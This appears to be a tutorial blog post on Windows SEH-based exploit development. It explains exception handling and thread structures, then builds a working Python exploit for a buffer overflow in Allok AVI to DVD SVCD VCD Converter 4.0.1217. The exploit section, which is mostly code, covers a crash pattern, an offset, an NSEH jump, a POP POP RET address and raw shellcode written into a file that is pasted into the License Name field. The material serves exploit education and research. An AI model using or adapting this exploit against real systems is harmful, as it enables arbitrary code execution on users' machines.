Windows Exploit Development Part III
SEH Handler mechanism behind the application
Hello everyone. I’ll be talking about Windows Exploit Development SEH today. The second flaw I found was in Allok Avi to DVD SVCD Converter, which you can find at this link: https://www.exploit-db.com/exploits/44549)
Let’s start by looking at what SEH (Structured Exception Handling) is. Structured Exception Handling (SEH) is a way for Windows to handle both program and hardware errors in the same way. This means that the software will try to run a block of code, and if something goes wrong, it will do what the “except” block says. The exception driver is just a block of code that tells the system what to do when something goes wrong. In other words, it takes care of the problem.
Each Pointers Exception has its own structure.
1
2
3
4
typedef struct _EXCEPTION_POINTERS {
PEXCEPTION_RECORD ExceptionRecord;
PCONTEXT ContextRecord;
} EXCEPTION_POINTERS, *PEXCEPTION_POINTERS;
This Syntax contains an exception record with a machine-independent description of an exception and a context record with a machine-dependent description of the processor context at the time of the exception.
I will not go into this much detail for more information about this pointer and its members check this link: https://docs.microsoft.com/en-us/windows/desktop/Debug/structured-exception-handling.
Short desciption of TEB & TIB
We will talk a bit about what is TEB (Thread Environment Block) & TIB (Thread Information Block). The Win32 Thread Information Block (TIB) is a data structure in Win32 on x86 that stores information about the currently running thread, which is located at FS:[0]. Let’s just look a little in WinDGB.
I don’t have ASLR turned off, and my address is always changing, but don’t worry about that. It might be hard to understand this idea at buffer overflow SEH. But focus on the first four bytes.
The pointer is set to 0x01d0ff78, which is the start of the SEH chain. When you look at that place. We can see where the end of SEH is.
Opcode 0xff 0xff 0xff 0xff indicates the end of the SEH chain. In Immunity Debugger we have a section called SEH Chain and there we can see the Start and the End of the SEH.
Exploit the application
Now that we know how this method works, let’s start putting it to use. Let’s make a POC in python.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#######################################################
# Exploit Title: Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)
# Date: 25.04.2018
# Exploit Author:T3jv1l
# Vendor Homepage:http://www.alloksoft.com/
# Software: www.alloksoft.com/allok_avi2dvd.exe
# Category:Local
# Contact:https://twitter.com/T3jv1l
# Version: Allok AVI to DVD SVCD VCD Converter 4.0.1217
# Tested on: Windows 7 SP1 x86
# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
#############################################################
import struct
print"""
#1. Download and install the setup file
#2. Run this exploit code via python 2.7
#3. A file "Evil.txt" will be created
#4. Copy the contents of the file (Evil.txt)and paste in the License Name field
#5. Click Register and BOMM !!!! """
junk = "A" * 4000
exploit = junk
try:
file = open("Evil.txt","wb")
file.write(exploit)
file.close()
except:
print "[+] Don't Crush me !"
Run the script, and then let’s use WinDGB to look at the software. If you try to look in ESP like in the earlier post, you won’t find anything interesting. But this is what you see when you dump the TEB after an exception.
Our string is successfully passed. That means we can overwrite the SEH. Now we need to found offset. We use again mona.py for create pattern (4000).
1
!mona pc 4000 in Immunity
Edit the python script:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
#######################################################
# Exploit Title: Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)
# Date: 25.04.2018
# Exploit Author:T3jv1l
# Vendor Homepage:http://www.alloksoft.com/
# Software: www.alloksoft.com/allok_avi2dvd.exe
# Category:Local
# Contact:https://twitter.com/T3jv1l
# Version: Allok AVI to DVD SVCD VCD Converter 4.0.1217
# Tested on: Windows 7 SP1 x86
# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
#############################################################
import struct
print"""
#1. Download and install the setup file
#2. Run this exploit code via python 2.7
#3. A file "Evil.txt" will be created
#4. Copy the contents of the file (Evil.txt)and paste in the License Name field
#5. Click Register and BOMM !!!! """
junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2F"
exploit = junk
try:
file = open("Evil.txt","wb")
file.write(exploit)
file.close()
except:
print "[+] Don't Crash me !"
Attach the process in Imunity Debugger and run your script and put the content in the License Name field.
Now that we have the distance, we can see if we can overwrite the SEH chain and NSEH again.Change the script again and atach to the process.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#######################################################
# Exploit Title: Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)
# Date: 25.04.2018
# Exploit Author:T3jv1l
# Vendor Homepage:http://www.alloksoft.com/
# Software: www.alloksoft.com/allok_avi2dvd.exe
# Category:Local
# Contact:https://twitter.com/T3jv1l
# Version: Allok AVI to DVD SVCD VCD Converter 4.0.1217
# Tested on: Windows 7 SP1 x86
# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
#############################################################
import struct
print"""
#1. Download and install the setup file
#2. Run this exploit code via python 2.7
#3. A file "Evil.txt" will be created
#4. Copy the contents of the file (Evil.txt)and paste in the License Name field
#5. Click Register and BOMM !!!! """
junk = "A"*780
nseh="B"*4
seh="C"*1000 #Default
exploit = junk + nseh + seh
try:
file = open("Evil.txt","wb")
file.write(exploit)
file.close()
except:
print "[+] Don't Crash me !"
We can see that the SEH is being overwritten, but let’s look at the stack to see what happened more clearly.
I’ll now tell you how this trick works. When the error happens, the computer moves to the SEHandle. All we have to do to get to our message is put some code. If you fake a second exception, the program will move to the next SEH address. Since the SE handler comes before the Next SEH reference, we can change the Next SEH (NSEH). Since the shellcode comes after the Handler, we can trick the SEHandler into running pop pop ret instructions. This will put the address of the Next SEH (NSEH) in EIP, so the code in Next SEH will be run. Basically, the code will skip over some bytes and run the shellcode.
| BUFFER | NSEH | SEH | NOPS | Shellcode |
|---|---|---|---|---|
| A * 790 | 0x909006eb —> 6 bytes | 0xPOP_POP_RET | NOPNOPNOPNOP | \xba\xd5\x31\x08\x38… |
This is how the structure of this exploit looks, but keep in mind we need to use 6 bites for jump at pop pop ret address Now we need to found pop pop ret address. Open Immunity Debugger use ALT + E to search in dll’s. I will use this dll.
1
00060000|100010E9|SkinMagi|1, 8, 1, 1|C:\Program Files\Allok AVI to DVD SVCD VCD Converter\SkinMagic.dll
If you can’t find the pop pop ret address without using NULL byte, you can use CTRL+L to go to the next pop pop ret address. Offset 780 + 6_bites_jump + POP_POP_RET + nop + shellcode gives us all the pieces. Look out, this method needs more NOPs.
Final POC.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#######################################################
# Exploit Title: Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)
# Date: 25.04.2018
# Exploit Author:T3jv1l
# Vendor Homepage:http://www.alloksoft.com/
# Software: www.alloksoft.com/allok_avi2dvd.exe
# Category:Local
# Contact:https://twitter.com/T3jv1l
# Version: Allok AVI to DVD SVCD VCD Converter 4.0.1217
# Tested on: Windows 7 SP1 x86
# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
#############################################################
import struct
print"""
#1. Download and install the setup file
#2. Run this exploit code via python 2.7
#3. A file "Evil.txt" will be created
#4. Copy the contents of the file (Evil.txt)and paste in the License Name field
#5. Click Register and BOMM !!!! """
junk = "A"*780
nseh="\x90\x90\xeb\x10" # 6 bytes for jump
seh="\xf1\xdb\x01\x10" # 1001DBF1 5F POP EDI , POP ESI ,RET
nop="\x90" * 1000
shellcode = ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
exploit = junk + nseh + seh + nop + shellcode
try:
file = open("Evil.txt","wb")
file.write(exploit)
file.close()
except:
print "[+] Don't Crash me !"
Run the script, copy content the Evil.txt in the “License Name” field.
Reference
https://www.exploit-db.com/docs/english/17971-buffer-overflow-exploitation-seh.pdf